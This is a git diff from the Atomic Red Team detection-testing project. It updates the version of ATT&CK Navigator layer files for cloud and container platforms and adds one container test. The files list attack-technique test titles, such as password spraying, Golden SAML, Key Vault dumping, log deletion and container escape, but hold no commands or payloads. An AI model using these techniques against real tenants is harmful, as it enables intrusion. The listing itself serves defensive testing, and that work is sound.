Merge branch 'master' into patch-3

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure - adding user to Azure AD role\n- Azure - adding service principal to Azure AD role\n- AzureAD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure - adding user to Azure AD role\n- Azure - adding service principal to Azure AD role\n- AzureAD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":1,"enabled":true,"comment":"\n- ExecIntoContainer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
+{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
+{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
+{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":5,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View 